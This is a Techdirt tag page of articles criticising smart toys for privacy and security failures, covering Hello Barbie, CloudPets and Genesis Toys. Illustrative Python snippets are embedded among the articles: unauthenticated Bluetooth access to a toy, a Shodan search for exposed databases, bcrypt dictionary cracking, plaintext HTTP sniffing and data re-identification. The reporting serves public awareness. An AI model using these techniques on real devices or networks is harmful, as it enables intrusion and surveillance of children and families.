smart toys – Techdirt

Stories filed under: "smart toys"

Privacy Advocates Continue To Warn That Modern Toys Are A Privacy Mess

from the My-Barbie-needs-a-better-firewall dept

A decade or so ago there was a wave of warnings by privacy advocates about how modern toys had become major surveillance devices. Makers of voice recognition toys in particular had a nasty habit, researchers warned, of collecting everything your child says, poorly “anonymizing” the data (a meaningless term), then failing to secure that data from attackers.

A decade later and researchers and activists are still busy trying to get consumers to understand that modern toys are a privacy and security mess. Companies continue to over-collect data on children and monetize that data for advertising, allowing the creation of detailed profiles on children. All while not really making that clear in terms of service. And while hiding behind flimsy claims of “anonymization.”

Year after year, privacy advocates warn that significant reform is needed, and year after year not a whole lot changes when it comes to the warnings or our collective response to them:

It’s just one example of a growing trend, according to nonprofit researchers at the U.S. Public Interest Research Group (PIRG). The organization’s recent report said smart toys bring new risks, including microphones and cameras, paired with significant data collection.

“Having any data collected on a child that isn’t strictly necessary is really reckless and unsafe,” said RJ Cross, of U.S. PIRG.

And these lax privacy and security standards extend to educational computer learning products. A July 2022 study by Human Rights Watch found that the “overwhelming majority” of EdTech products endorsed by 49 governments during the pandemic surveilled or had the capacity to surveil children in ways that risked or infringed on their rights.

Forcing legal accountability on global toymakers is often an uphill climb. You’ll occasionally see a company hit with a major lawsuit (as Genesis Toys was in 2017 after it was discovered that its Bluetooth and Wi-Fi enabled toys lacked even rudimentary security, allowing third-party surveillance of kids), but most of these offenders see no meaningful repercussions for lax security and privacy standards.

And again, all of these toy companies (even the ones hit with major lawsuits) hide behind the idea that there’s nothing to worry about because kid data is “anonymized.” But numerous studies keep showing how easy it is to identify an “anonymized” individual in a data set like this with just a small smattering of additional data. The more compromised datasets stumble around the Internet, the worse it gets.
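As a purely illustrative sketch of why “anonymization” is such a flimsy defense: the classic linkage attack is nothing more than a database join on quasi-identifiers. The column names and records below are made up, but the shape of the attack is the real thing.

```python
import pandas as pd

# "Anonymized" voice-recording logs: names stripped, but quasi-identifiers remain.
# (Hypothetical columns and values, purely for illustration.)
anonymized = pd.DataFrame({
    "zip": ["60614", "60614", "98103"],
    "birthdate": ["2016-03-02", "2017-11-20", "2015-07-09"],
    "gender": ["F", "M", "F"],
    "recording_id": ["rec_001", "rec_002", "rec_003"],
})

# The "small smattering of additional data" an attacker might already have,
# e.g. scraped from social media or bought from a data broker.
auxiliary = pd.DataFrame({
    "name": ["Jane Doe"],
    "zip": ["60614"],
    "birthdate": ["2016-03-02"],
    "gender": ["F"],
})

# Joining on the quasi-identifiers re-attaches a name to the "anonymous" record.
reidentified = anonymized.merge(auxiliary, on=["zip", "birthdate", "gender"])
print(reidentified[["name", "recording_id"]])
```

The more auxiliary datasets are floating around, the more of those joins succeed.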

COPPA is dated and broken, the U.S. FTC lacks the money or staff to pursue privacy at any meaningful scale, and we still haven’t passed even a rudimentary new privacy law for the Internet era. When it comes to everything from your smartphone apps to your kid’s Wi-Fi connected Barbie, we’ve made it abundantly clear that making money was our top priority, and privacy remains a distant afterthought.

Filed Under: advertising, anonymization, privacy, security, smart toys, toys

New Study Finds Poorly Secured Smart Toys Let Attackers Listen In On Your Kids

from the barbie-needs-a-better-firewall dept

Thu, Nov 16th 2017 03:50pm - Karl Bode

We’ve long noted how the painful lack of security and privacy standards in the internet of (broken) things is also very well-represented in the world of connected toys. Like IoT vendors, toymakers were so eager to make money that they left even basic privacy and security standards stranded in the rear view mirror as they rushed to connect everything to the internet. As a result, we’ve seen repeated instances where your kids’ conversations and interests are being hoovered up without consent, with the data frequently left unencrypted and openly accessible in the cloud.

With Luddites everywhere failing to realize that modern Barbie needs a better firewall, this is becoming a bigger and bigger problem. The latest case in point: new research by Which? and the German consumer group Stiftung Warentest found yet more flaws in Bluetooth and Wi-Fi-enabled toys that allow a total stranger to listen in on or chat up your toddler:

“The investigation found that four out of seven of the tested toys could be used to communicate with the children playing with them. Security failures were discovered in the Furby Connect, i-Que Intelligent Robot, Toy-Fi Teddy and CloudPets.

With each of these toys, the Bluetooth connection had not been secured, meaning the researcher did not need a password, pin or any other authentication to gain access. Little technical know-how was needed to hack into the toys to start sharing messages with a child.”

Again, the problem isn’t just bad security, it’s the total lack of security:

“With the i-Que Intelligent Robot, available from Argos and Hamleys, the investigation discovered that anyone could download the app, find an i-Que within their Bluetooth range and start using the robot’s voice by typing into a text field. The toy is made by Genesis, which also manufactures the My Friend Cayla doll, recently banned in Germany owing to security and hacking concerns. Both toys are distributed in the UK by Vivid.”
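To give a sense of how low the bar is when a Bluetooth device requires no pairing, PIN, or authentication, here’s a rough sketch using the Python bleak library. The device name and characteristic UUID are hypothetical stand-ins rather than the real toys’ values, but the flow (scan, connect, write) is roughly all the “hacking” the researchers describe.

```python
import asyncio
from bleak import BleakScanner, BleakClient

# Hypothetical values for illustration only; a real toy exposes its own
# device name and GATT characteristic UUIDs.
TOY_NAME = "SmartToy"
AUDIO_CHAR_UUID = "0000ffe1-0000-1000-8000-00805f9b34fb"

async def main():
    # Discover nearby BLE devices; an unpaired toy shows up like any other.
    devices = await BleakScanner.discover(timeout=5.0)
    toy = next((d for d in devices if d.name and TOY_NAME in d.name), None)
    if toy is None:
        print("No toy in range")
        return

    # With no pairing or PIN required, connecting is the whole "attack."
    async with BleakClient(toy.address) as client:
        print(f"Connected to {toy.name} at {toy.address}")
        # Writing to an unauthenticated characteristic could, for example,
        # make the toy speak arbitrary audio.
        await client.write_gatt_char(AUDIO_CHAR_UUID, b"hello")

asyncio.run(main())
```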

Genesis was already facing a lawsuit here in the States accusing it of violating COPPA (the Children’s Online Privacy Protection Act of 1998) by failing to adequately inform parents that their kids’ conversations and personal data collected by the toys are being shipped off to servers and third-party companies. Said lawsuit also points out how the privacy policies governing the collection of kids’ data aren’t clear, aren’t prominently displayed, and often change without notice. Overseas the reaction has been notably more hysterical, with German regulators urging parents to destroy these not-so-smart dolls or pay massive fines.

As is usually the case, the companies responsible for this total privacy and security failure like to portray these flaws as limited in scope and unlikely to be exploited:

“The British Toy and Hobby Association, of which Vivid and Hasbro are members, said: “The industry takes its responsibilities incredibly seriously when making products for children, with BTHA members investing heavily in everything from toy safety to data privacy and online security.

“We are aware of the Which? report, but understand the circumstances in which these investigations have taken place rely on a perfect set of circumstances and manipulation of the toys and the software that make the outcome highly unlikely in reality.”

Again though, this often isn’t just a matter of vulnerabilities, but of no security or privacy standards whatsoever. The idea that this isn’t being exploited, however infrequently, seems unlikely — especially as the media highlights more and more similar flaws. And again, with the internet of broken things introducing millions of new attack vectors into homes and businesses worldwide every day, the impact from this sort of privacy and security apathy will be cumulative.

Filed Under: iot, kids, privacy, smart toys, surveillance

'Smart' Stuffed Animal Company Leaves Voice, Other Data Of Millions Publicly Exposed

from the internet-of-not-so-smart-things dept

Tue, Feb 28th 2017 10:51am - Karl Bode

So we’ve noted time and time again how so-called “smart” toys aren’t immune to the security and privacy problems plaguing the internet of broken things. Whether we’re talking about the Vtech hack (which exposed kids’ selfies, chat logs, and voice recordings) or the lawsuits against Genesis Toys (whose products suffer from vulnerabilities to man-in-the-middle attacks), the story remains the same: these companies were so excited to connect anything and everything to the internet that few could be bothered to spend more than a fleeting moment thinking about product security and consumer privacy.

Troy Hunt, creator of the very useful Have I Been Pwned? website, this week highlighted one of the biggest privacy breaches yet when it comes to the connected toy market. Spiral Toys makes the CloudPets line of stuffed animals, which adorably record and play back voice messages that can be sent over the Internet by parents and children alike. Less adorable is the fact that this collected data is stored by a Romanian company called mReady, which apparently left it in a publicly available database neither protected by a password nor placed behind a firewall.

As such, that data was publicly accessible to anybody perusing the data via the Shodan search engine. And while it’s hard to nail down a precise number, Hunt estimates that somewhere around 2 million voice recordings of children and parents were just left exposed to the open air, as well as the e-mail addresses and passwords for more than 800,000 Spiral Toys CloudPets accounts.
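For a sense of how little effort “perusing the data via the Shodan search engine” actually involves, here’s a minimal sketch using Shodan’s official Python client. The API key is a placeholder, and the query (publicly reachable MongoDB instances) is just an example of the kind of search that turns up unprotected databases; it is not presented as the exact query used here.

```python
import shodan

# Placeholder API key; a basic Shodan account is enough for simple searches.
api = shodan.Shodan("YOUR_API_KEY")

# Databases answering on the public internet show up in ordinary queries.
results = api.search("product:MongoDB")
print(f"{results['total']} publicly reachable MongoDB instances indexed")

# Print a handful of the hosts Shodan has already indexed.
for match in results["matches"][:5]:
    print(match["ip_str"], match.get("org", "unknown org"))
```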

On a positive note, the company did appear to store CloudPets passwords as bcrypt hashes, one of the more secure methods available. But that protection appears to have been undermined by the fact that the company (as outlined in this instructional video for customers) imposes absolutely no minimum password strength requirements:

“However, counteracting that is the fact that CloudPets has absolutely no password strength rules. When I say “no rules”, I mean you can literally have a password of “a”. That’s right, just a single character. The password used here in the demonstration is literally just “qwe”; 3 characters and a keyboard sequence. What this meant is that when I passed the bcrypt hashes into hashcat and checked them against some of the world’s most common passwords (“qwerty”, “password”, “123456”, etc.) along with the passwords “qwe” and “cloudpets”, I cracked a large number in a very short time.”
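Hunt’s underlying point is that bcrypt only makes each guess slow, and with no minimum password length an attacker barely needs any guesses. A small sketch with the Python bcrypt package (using a made-up “leaked” hash and a tiny wordlist) shows the shape of the dictionary attack he describes running with hashcat:

```python
import bcrypt

# A hash of the laughably weak password "qwe", standing in for a leaked record.
leaked_hash = bcrypt.hashpw(b"qwe", bcrypt.gensalt())

# A tiny dictionary of common and trivially short passwords.
wordlist = [b"123456", b"password", b"qwerty", b"cloudpets", b"qwe", b"a"]

# bcrypt is deliberately slow per guess, but with no password strength rules
# an attacker only needs a handful of guesses per account.
for candidate in wordlist:
    if bcrypt.checkpw(candidate, leaked_hash):
        print(f"Cracked: {candidate.decode()}")
        break
```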

As we’ve seen with so many IoT companies, many simply don’t respond when contacted and warned about vulnerabilities. And when they are warned, lawsuit threats are often more common than cogent responses. In this case, Hunt notes that Spiral Toys was contacted three times about the data being publicly exposed and its weak password rules, and it chose to ignore each one of them:

“3 attempts to warn the organisation of a serious security vulnerability and not a single response. I’ve said many times before in many blog posts, public talks and workshops that one of the greatest difficulties I have in dealing with data breaches is getting a response from the organisation involved. Time and time again, there are extensive delays or no response at all from the very people that should be the most interested in incidents like this. If you run any sort of online service whatsoever, think about what’s involved in ensuring someone can report this sort of thing to you because this whole story could have had a very different outcome otherwise.”

In other words, here’s yet another company that not only thinks security and privacy are an afterthought, but can’t actually be bothered to respond when informed that the data of millions of users was just sitting unsecured in public view. These companies don’t appear to realize it, but their incompetence acts as a living, breathing advertisement for why dumb toys and devices remain the smarter option.

Filed Under: children, cloudpets, iot, security, smart toys, stuffed animals
Companies: spiral toys

Another Lawsuit Highlights How Many 'Smart' Toys Violate Privacy, Aren't Secure

from the Barbie-is-a-rat dept

Thu, Dec 8th 2016 01:05pm - Karl Bode

So we’ve talked a bit about the privacy implications of smart toys, and the fact that people aren’t exactly thrilled that Barbie now tracks your children’s behavior and then uploads that data to the cloud. Like most internet-of-not-so-smart things, these toys often come with flimsy security and only a passing interest in privacy. As such we’ve increasingly seen events like the Vtech hack, where hackers obtained the names, email addresses, passwords, and home addresses of 4,833,678 parents, and the first names, genders and birthdays of more than 200,000 kids.

Unsurprisingly, the collection of kids’ babbling while in the company of smart toys continues to ruffle feathers. This week, a coalition of consumer advocates including Consumers Union filed suit against Genesis Toys, the maker of two such toys, the My Friend Cayla doll and the i-Que Intelligent Robot. According to the full lawsuit (pdf), the toy maker is violating COPPA (the Children’s Online Privacy Protection Act of 1998) by failing to adequately inform parents that their kids’ conversations and personal data collected by the toys are being shipped off to servers and third-party companies.

Among the problems cited in the complaint is that the privacy policies governing the collection of kids’ data aren’t clear, aren’t prominently displayed, and often change without notice. Parents aren’t properly informed that data is being culled from the toys and sent off to companies like Nuance Communications, most commonly known for its Dragon voice recognition software, but a company that also has prominent roles in healthcare dictation and as a defense contractor. Both toys are, by extension, governed by Nuance’s privacy policy, which among other things says:

“We may use the information that we collect for our internal purposes to develop, tune, enhance, and improve our products and services, and for advertising and marketing consistent with this Privacy Policy.” It continues, “If you are under 18 or otherwise would be required to have parent or guardian consent to share information with Nuance, you should not send any information about yourself to us.”

With the toys being marketed to “ages 4 and up” and mostly used by kids under age 18, the lawsuit states the companies selling and collecting this toy data are violating COPPA. Under COPPA, companies gathering kids’ data have to provide notice to, and obtain consent from, parents regarding data collection. They also have to provide parents tools to access, review and delete this data if desired, as well as the ability to dictate that the data can be collected but not shared with third parties. The complaint suggests neither Nuance nor Genesis Toys is doing any of this.

And again, privacy is just part of the equation. There’s also the fact that these toys just aren’t all that secure. A report by the Norwegian Consumer Council (pdf) found that a lot of the data transmitted by these toys travels over vanilla, unencrypted HTTP connections that could be subject to man-in-the-middle attacks. Reconfiguring the devices to create in-home surveillance tools was also “very easy and requires little technical know-how,” according to the report.
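For what “vanilla, unencrypted HTTP” means in practice: anyone sitting on the same network path can read the traffic without breaking anything at all. A minimal sketch with the Python scapy library (assuming root privileges and the system’s default network interface) makes the point; whatever a toy sends over plain HTTP arrives as readable text.

```python
from scapy.all import sniff, TCP, Raw

def show_plaintext(pkt):
    # Plain HTTP requests and responses are just ASCII on the wire.
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        payload = pkt[Raw].load
        if payload.startswith((b"GET ", b"POST ", b"HTTP/")):
            print(payload[:200])

# Passively watch port-80 traffic; no credentials or exploit required,
# just a position somewhere on the network path.
sniff(filter="tcp port 80", prn=show_plaintext, store=False)
```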

So again, much like with all internet of things devices, companies were so excited to integrate internet connectivity that they effectively forgot about user privacy and security. Are we perhaps noticing an ongoing theme yet?

Filed Under: coppa, i-que intelligent robot, iot, my friend cayla, privacy, security, smart toys
Companies: genesis toys, nuance

Barbie Joins The Growing Chorus Of People And Devices Spying On You

from the let's-discuss-your-shopping-preferences,-susie dept

Thu, Mar 19th 2015 03:47pm - Karl Bode

Samsung recently took a significant media beating after people actually bothered to read the company’s privacy policy, only to discover that the company’s “smart” TVs were collecting snippets of living room conversation and transmitting them to third parties for analysis. Samsung ultimately issued a blog post stating it was only collecting a limited amount of voice data to improve voice command functionality. Besides, said Samsung, if you don’t want your voice commands collected, you can disable the functionality (even though you lose some core TV features in the process).

Of course, while Samsung got the brunt of the public and media hysteria, many people didn’t seem to realize that nearly everything that takes voice commands (from your home automation system to your iPhone) already engages in this same behavior. Case in point: Mattel is taking more than a little heat for the company’s new “Hello Barbie,” which connects to Wi-Fi and records kids’ voice commands, routing them to an external server in order to improve voice command tech. In a video from February, Mattel showed how Barbie now stores your preferences and even provides career advice.

Groups like the Campaign for a Commercial-Free Childhood weren’t impressed, and see this as the opening salvo in a disturbing trend in marketing to children:

“Imagine your children playing with a Wi-Fi-connected doll that records their conversations–and then transmits them to a corporation which analyzes every word to learn “all of [the child’s] likes and dislikes.” That’s exactly what Mattel’s eavesdropping “Hello Barbie” will do if it is released this fall, as planned. But we can stop it!

Kids using “Hello Barbie” won’t only be talking to a doll, they’ll be talking directly to a toy conglomerate whose only interest in them is financial. It’s creepy–and creates a host of dangers for children and families. Children naturally reveal a lot about themselves when they play. In Mattel’s demo, Barbie asks many questions that encourage kids to share information about their interests, their families, and more–information advertisers can use to market unfairly to children.”

While the CCFC works to keep the toy from store shelves, Mattel is promising that security and privacy have been its top priority while crafting a doll that learns what kids like:

“Mattel and ToyTalk, the San Francisco-based start-up that created the technology used in the doll, say the privacy and security of the technology have been their top priority. “Mattel is committed to safety and security, and Hello Barbie conforms to applicable government standards,” Mattel said in a statement.”

The problem is, we’ve seen repeatedly how the companies rushing face-first toward the billions in potential revenues from the “Internet of Things” market are so fixated on profit that security and privacy have been afterthoughts — if a thought at all. It doesn’t matter if we’re talking about smart TVs with trivial to non-existent security or easily hacked smart car tech; companies are showing again and again that privacy and security really aren’t paramount. That’s before we even discuss how this collected voice data creates a wonderful new target for nosy governments courtesy of the Third Party Doctrine.

So while some of this hysteria over what’s being collected probably veers into hyperbole territory, the cardboard-grade security and privacy standards most companies are adopting certainly create cause for concern. The good news, I suppose: the “smarter” our products get, the bigger the market is for “dumb” products that just sit there and do what they’re supposed to do, whether that’s a television that just displays the damn signal sent to it or utterly insentient dolls that just shut up, smile and drink their fake tea.

Filed Under: barbie, privacy, smart devices, smart toys
Companies: mattel